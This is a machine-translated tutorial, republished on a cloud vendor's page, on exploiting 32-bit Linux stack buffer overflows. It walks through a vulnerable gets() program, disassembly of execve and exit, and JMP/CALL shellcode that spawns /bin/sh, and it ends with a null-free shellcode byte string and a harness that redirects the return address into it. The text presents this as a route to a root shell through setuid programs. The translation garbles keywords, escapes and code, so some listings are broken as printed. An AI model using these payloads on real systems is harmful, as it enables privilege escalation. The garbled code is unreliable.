Stack Overflow technology from entry to entry: How to Write shell code

Last Update:2013-12-14 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Although overflow is inevitable in the Process of program development, it poses a huge threat to the system. Due to the particularity of the system, when overflow occurs, attackers can exploit this vulnerability to obtain the system's advanced permissions root. Therefore, this article will introduce the stack overflow technology in detail ......

Before you begin to understand stack overflow, you should first understand the win32 assembly language and the register composition and functions. You must have basic knowledge about stack and storage allocation. There are many computer books related to this. I will simply elaborate on the principles and focus on applications. Next, you should understand linux. In this lecture, our example will be developed on linux.

Related Recommendations]:

Stack Overflow technology from entry to entry: Using stack overflow to obtain shell

Stack Overflow technology from entry to advanced: Stack Overflow in windows

1. First, review the basic knowledge.

Physically, a stack is a memory space allocated continuously. Various variables are declared in a program. Static global variables are located in the Data Segment and loaded when the program starts running. Dynamic local variables of the program are allocated to the stack.

In terms of operation, the stack is a queue that comes first and then goes out. The growth direction is the opposite to that of memory. We specify that the memory growth direction is up, and the stack growth direction is down. Stack Operation push = ESP-4, the operation is pop = ESP + 4. In other words, the stack in the old value, its memory address, but greater than the new value. Keep this in mind, because this is the basic theoretical basis for Stack Overflow.

In the callback function call, the stack will be pushed in sequence: parameters, return address, and EBP. If a function has a local variable, the corresponding space is opened in the stack to construct the variable. When the function execution ends, the content of these local variables will be lost. But not cleared. When the function returns, the EBP is displayed, the stack is restored to the function call address, and the return address to the EIP is displayed to continue executing the program.

In C language programs, the parameter pressure stack order is reversed. For example, func (a, B, c ). When the parameter is added to the stack, It is c, B, and. When taking the parameters, because the stack first goes in and then out, take a at the top of the stack, then B, and finally take c. These are the basic knowledge of assembly language. You must understand these knowledge before you begin.

2. Now let's see what Stack Overflow is.

Stack allocation during runtime

Stack Overflow means that too much data is written to the data block regardless of the size of the data block in the stack, leading to data out of bounds, and the result overwrites the old stack data.

For example, program 1:

# Include

Int main ()

{

Char name [8];

Printf ("Please type your name :");

Gets (name );

Printf ("Hello, % s! ", Name );

Return 0;

}

Compile and execute. Input ipxodi to output Hello and ipxodi !. How is the stack operated when the program is running?

When the main function starts to run, the stack will be placed in the return address and EBP in sequence.

We use gcc-S to obtain the Assembly Language Output. We can see that the beginning of the main function corresponds to the following statement:

Pushl % ebp

Movl % esp, % ebp

Subl $8, % esp

First, he saves the EBP, and then EBP is equal to the current ESP, so that EBP can be used to access the local variables of this function. After that, ESP minus 8, that is, the stack increases by 8 bytes to store the name [] array. Finally, main returns. The address in ret is displayed and assigned to the EIP. The CPU continues to execute the command pointed to by the EIP.

Stack Overflow

Now let's run it again. Input ipxodiAAAAAAAAAAAAAAA. After gets (name) is executed, the name array cannot accommodate because the input name string is too long, you have to write 'A' to the top of the memory '. Because the stack growth direction is opposite to the memory growth direction, these 'A' overwrites the old elements of the stack. We can find that EBP and ret have been overwritten by 'A. When main returns, the 'aaa' ASCII code: 0x4141414141 is used as the return address. The CPU tries to execute the command at 0x41414141 and the result is incorrect. This is a stack overflow.

3. How to Use Stack Overflow

We have created a stack overflow. The principle can be summarized as follows: Because the string processing functions (gets, strcpy, and so on) do not monitor and limit the array out-of-bounds, we use the character array to write out-of-bounds and overwrite the value of the old element in the stack, you can modify the return address.

In the preceding example, this causes the CPU to access a non-existent command and the result is incorrect. In fact, when the stack overflows, we have completely controlled the next action of this program. If we overwrite the returned address with an actual instruction address, the CPU will execute our instruction instead.

In the UINX/linux system, our command can execute a shell, which will obtain the same permissions as the program that is overflows by our stack. If this program is set UID, we can get the root shell. The next section describes how to write a shell code.

How to Write a shell code

I. shellcode basic algorithm analysis

In the program, a shell program is written as follows:

Shellcode. c

------------------------------------------------------------------------

# Include

Void main (){

Char * name [2];

Name [0] = "/bin/sh"

Name [1] = NULL;

Execve (name [0], name, NULL );

}

------------------------------------------------------------------------

The execve function will execute a program. He needs the program name address as the first parameter. A pointer array with content of argv [I] (argv [n-1] = 0) of the program serves as the second parameter, and (char *) 0 serves as the third parameter.

Let's take a look at execve's assembly code:

[Nkl10] $ Content $ nbsp; gcc-o shellcode-static shellcode. c

[Nkl10] $ Content $ nbsp; gdb shellcode

(Gdb) disassemble _ execve

Dump of worker er code for function _ execve:

0x80002bc <__execve>: pushl % ebp;

0x80002bd <__execve + 1>: movl % esp, % ebp; above is the function header.

0x80002bf <__ execve + 3>: pushl % ebx; save ebx

0x80002c0 <__ execve + 4>: movl $ 0xb, % eax; eax = 0xb, eax indicates the number of system calls.

0x80002c5 <__execve + 9>: movl 0x8 (% ebp), % ebx; ebp + 8 is the first parameter "/bin/sh \ 0"

0x80002c8 <__execve + 12>: movl 0xc (% ebp), % ecx; ebp + 12 is the address of the second parameter name array.

0x80002cb <__execve + 15>: movl 0x10 (% ebp), % edx; ebp + 16 is the address of the third parameter NULL pointer .; The name [2-1] content is NULL, which is used to store the return value.

0x80002ce <__execve + 18>: int $0x80; Execute system call 0 x B (execve)

0x80002d0 <__ execve + 20>: movl % eax, % edx; the processing of the returned values is useless.

0x80002d2 <__execve + 22>: testl % edx, % edx

0x80002d4 <__ execve + 24>: jnl 0x80002e6 <__ execve + 42>

0x80002d6 <__ execve + 26>: negl % edx

0x80002d8 <__ execve + 28>: pushl % edx

0x80002d9 <__ execve + 29>: call 0x8001a34

<__Normal_errno_location>

0x80002de <__execve + 34>: popl % edx

0x80002df <__execve + 35>: movl % edx, (% eax)

0x80002e1 <__ execve + 37>: movl $0 xffffffff, % eax

0x80002e6 <__execve + 42>: popl % ebx

0x80002e7 <__execve + 43>: movl % ebp, % esp

0x80002e9 <__ execve + 45>: popl % ebp

0x80002ea <__execve + 46>: ret

0x80002eb <__execve + 47>: nop

End of worker er dump.

After the above analysis, we can get the following simplified command algorithm:

Movl $ execve system call number, % eax

Movl "bin/sh \ 0" Address, % ebx

Address of the movl name array, % ecx

Movl name [n-1] address, % edx

Int $0x80; execve)

After execve is successfully executed, the program shellcode will exit and/bin/sh will continue to be executed as a sub-process. However, if execve fails to be executed (for example, there is no/bin/sh file), the CPU will continue to execute subsequent commands and the results will not know where to go. Therefore, an exit () system call must be executed to end the execution of shellcode. c.

Let's take a look at the compilation code of exit (0:

(Gdb) disassemble _ exit

Dump of worker er code for function _ exit:

0x800034c <_ exit>: pushl % ebp

0x800034d <_ exit + 1>: movl % esp, % ebp

0x800034f <_ exit + 3>: pushl % ebx

0x8000350 <_ exit + 4>: movl $0x1, % eax; 1 system call

0x8000355 <_ exit + 9>: movl 0x8 (% ebp), % ebx; ebx is the parameter 0

0x8000358 <_ exit + 12>: int $0x80; triggers a system call.

0x800035a <_ exit + 14>: movl 0 xfffffffc (% ebp), % ebx

0x800035d <_ exit + 17>: movl % ebp, % esp

0x800035f <_ exit + 19>: popl % ebp

0x8000360 <_ exit + 20>: ret

0x8000361 <_ exit + 21>: nop

0x8000362 <_ exit + 22>: nop

0x8000363 <_ exit + 23>: nop

End of worker er dump.

It seems that the compilation code of exit (0) is simpler:

Movl $0x1, % eax; 1 system call

Movl 0, % ebx; ebx is the exit parameter 0

Int $0x80; triggers system call

To sum up, the merged assembly code is:

Movl $ execve system call number, % eax

Movl "bin/sh \ 0" Address, % ebx

Address of the movl name array, % ecx

Movl name [n-1] address, % edx

Int $0x80; execve)

Movl $0x1, % eax; 1 system call

Movl 0, % ebx; ebx is the exit parameter 0

Int $0x80; Execute system call (exit)

2. Implement a shellcode

Okay. Let's implement this algorithm. First, we must have a string "/bin/sh" and a name array. We can construct them, but how do we know their addresses in shellcode? Every time a program is dynamically loaded, the address of the string and name array is not fixed. Through the combination of JMP and call, hackers cleverly solved this problem.

------------------------------------------------------------------------

The offset address of jmp call #2 bytes popl % esi #1 byte // popl is the string address.

Movl % esi, array-offset (% esi) #3 bytes // construct the name array at string + 8, // name [0] Put the string address

Movb $0x0, nullbyteoffset (% esi) #4 bytes // place 0 in string + 7 as the end of string.

Movl $0x0, null-offset (% esi) #7 bytes // name [1] Put 0.

Movl $ 0xb, % eax #5 bytes // eax = 0xb is the execve syscall code.

Movl % esi, % ebx #2 bytes // address of ebx = string

Leal array-offset, (% esi), % ecx #3 bytes // ecx = start address of the name array

Leal null-offset (% esi), % edx #3 bytes // edx = name [1] address

Int $0x80 #2 bytes // int 0x80 is sys call

Movl $0x1, % eax #5 bytes // eax = 0x1 is the exit syscall code

Movl $0x0, % ebx #5 bytes // ebx = 0 is the return value of exit

Int $0x80 #2 bytes // int 0x80 is sys call

Call popl offset address #5 bytes // put the call here, the string address will be used as the return address to press the stack.

/Bin/sh string

------------------------------------------------------------------------

First, use the relative address of JMP to jump to the call. After the call command is executed, the address of the string/bin/sh will be pushed into the stack as the return address of the call. Now, go to popl esi and obtain the real address of the string from the string address just pushed into the stack. Then, 0 is assigned to the first byte of the string as the end of the string. The next 8 bytes. Construct two integers (eight bytes) in the name array ).

We can write shellcode. Write the Assembly source program first.

Shellcodeasm. c

------------------------------------------------------------------------

Void main (){

_ Asm __("

Jmp 0x2a #3 bytes

Popl % esi #1 byte

Movl % esi, 0x8 (% esi) #3 bytes

Movb $0x0 0x7 (% esi) #4 bytes

Movl $0x0, 0xc (% esi) #7 bytes

Movl $ 0xb, % eax #5 bytes

Movl % esi, % ebx #2 bytes

Leal 0x8 (% esi), % ecx #3 bytes

Leal 0xc (% esi), % edx #3 bytes

Int $0x80 #2 bytes

Movl $0x1, % eax #5 bytes

Movl $0x0, % ebx #5 bytes

Int $0x80 #2 bytes

Call-0x2f #5 bytes

. String/"/bin/sh/" #8 bytes

");

}

After compilation, use the gdb B/bx [address] command to obtain the hexadecimal representation.

Below, write the test program as follows: note that this test program is the basic program for testing shellcode)

Test. c

Char shellcode [] = "/xeb/x2a/x5e/x89/x76/x08/xc6/x46/x07/x00/xc7/x46/x0c/x00/x00/x00"

"/X00/xb8/x0b/x00/x00/x00/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80"

"/Xb8/x01/x00/x00/x00/xbb/x00/x00/x00/x00/xcd/x80/xe8/xd1/xff"

"/Xff/x2f/x62/x69/x6e/x2f/x73/x68/x00/x89/xec/x5d/xc3"

Void main (){

Int * ret;

Ret = (int *) & ret + 2; // ret is equal to main) return address // (+ 2 is because pushl ebp exists; otherwise, you can add 1 .)

(* Ret) = (int) shellcode; // modify main). The return address is the starting address of shellcode.

}

[Nkl10] $ Content $ nbsp; gcc-o test. c

[Nkl10] $ Content $ nbsp;./test

$ Content $ nbsp; exit

[Nkl10] $ Content $ nbsp;

We store the shellcode through a shellcode array. c) when the returned address ret is set to the starting address of the shellcode array, the program will execute our hellcode when returning, thus we get a shell. Run the result and get the bsh prompt $, indicating that a shell is successfully opened. It is necessary to explain that we put shellcode as a global variable in the data segment rather than as a piece of code. In the operating system, the content of a program code segment has read-only attributes. It cannot be modified. In our code, movl % esi, 0x8 (% esi) and other statements modify part of the code, so they cannot be placed in the code segment. Is This shellcode okay? Unfortunately, it is a little worse. In retrospect, the key to stack overflow lies in the overwrite of the string array. However, when processing strings, string functions such as gets and strcpy end with "/0. When/0, the write operation is completed. Our shellcode string contains a large number of/0 characters. Therefore, for getsname), The shellcode above is not feasible. Our shellcode cannot contain/0 characters.

Therefore, some commands need to be modified:

Old commands new commands

Movb $0x0 0x7 (% esi) xorl % eax, % eax

Molv $0x0, 0xc (% esi) movb % eax, 0x7 (% esi)

Movl % eax, 0xc (% esi)

--------------------------------------------------------

Movl $ 0xb, % eax movb $ 0xb, % al

--------------------------------------------------------

Movl $0x1, % eax xorl % ebx, % ebx

Movl $0x0, % ebx movl % ebx, % eax

Inc % eax

--------------------------------------------------------

The final shellcode is:

------------------------------------------------------------------------

Char shellcode [] =

00 "/xeb/x1f"/* jmp 0x1f */

02 "/x5e"/* popl % esi */

03 "/x89/x76/x08"/* movl % esi, 0x8 (% esi )*/

06 "/x31/xc0"/* xorl % eax, % eax */

08 "/x88/x46/x07"/* movb % eax, 0x7 (% esi )*/

0b "/x89/x46/x0c"/* movl % eax, 0xc (% esi )*/

0e "/xb0/x0b"/* movb $ 0xb, % al */

10 "/x89/xf3"/* movl % esi, % ebx */

12 "/x8d/x4e/x08"/* leal 0x8 (% esi), % ecx */

15 "/x8d/x56/x0c"/* leal 0xc (% esi), % edx */

18 "/xcd/x80"/* int $0x80 */

1a "/x31/xdb"/* xorl % ebx, % ebx */

1c "/x89/xd8"/* movl % ebx, % eax */

1e "/x40"/* inc % eax */

1f "/xcd/x80"/* int $0x80 */

21 "/xe8/xdc/xff"/* call-0x24 */

26 "/bin/sh"/*. string/"/bin/sh /"*/

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Stack Overflow technology from entry to entry: How to Write shell code

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support